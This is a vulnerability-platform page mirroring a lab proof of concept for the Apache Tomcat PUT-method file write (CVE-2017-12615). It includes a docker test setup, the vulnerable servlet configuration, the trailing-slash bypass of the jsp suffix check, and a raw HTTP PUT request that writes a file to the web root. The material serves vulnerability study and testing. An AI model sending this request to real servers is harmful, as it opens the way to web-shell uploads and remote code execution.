漏洞平台

POC详情： 0286fffac8a2ac0e2ac78455b950dbf201c94643

来源

https://github.com/cyberharsh/Tomcat-CVE-2017-12615

关联漏洞

标题： Apache Tomcat 安全漏洞 (CVE-2017-12615)
描述：Apache Tomcat是美国阿帕奇（Apache）软件基金会下属的Jakarta项目的一款轻量级Web应用服务器，它主要用于开发和调试JSP程序，适用于中小型系统。 Apache Tomcat 7.0.0版本至7.0.79版本存在远程代码执行漏洞。当上述版本的Tomcat启用HTTP PUT请求方法时，远程攻击者可以构造恶意请求利用该漏洞向服务器上传包含任意代码执行的jsp文件，并被服务器执行该文件，导致攻击者可以执行任意代码。

介绍

# Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)

[中文版本(Chinese version)](README.zh-cn.md)   

Tomcat version: 8.5.19 

## Environment Setup

```
docker-compose build
docker-compose up -d
```

After successfully running the commands above, you will see the example page of Tomcat through visiting the site `http://your-ip:8080`.


## Rationale

Reference links:

- http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
- https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
- https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e

Tomcat sets up the write permission（readonly=false）, which leads to the result that we can write files into the server.

```
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>
```

Although Tomcat checks the file suffix to some extent(can't write jsp directly), we can still bypass the limitation through some file system features(such as using `/` in Linux).

## POC

Send the following packets directly and then the shell will be written into the Web root directory.

```
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell
```

As follows:

![](01.png)

文件快照


 [4.0K]  /data/pocs/0286fffac8a2ac0e2ac78455b950dbf201c94643
├── [ 17K]  01.png
├── [  72]  docker-compose.yml
├── [ 314]  Dockerfile
├── [  11]  flagA
├── [1.9K]  README.md
└── [1.7K]  README.zh-cn.md

0 directories, 6 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。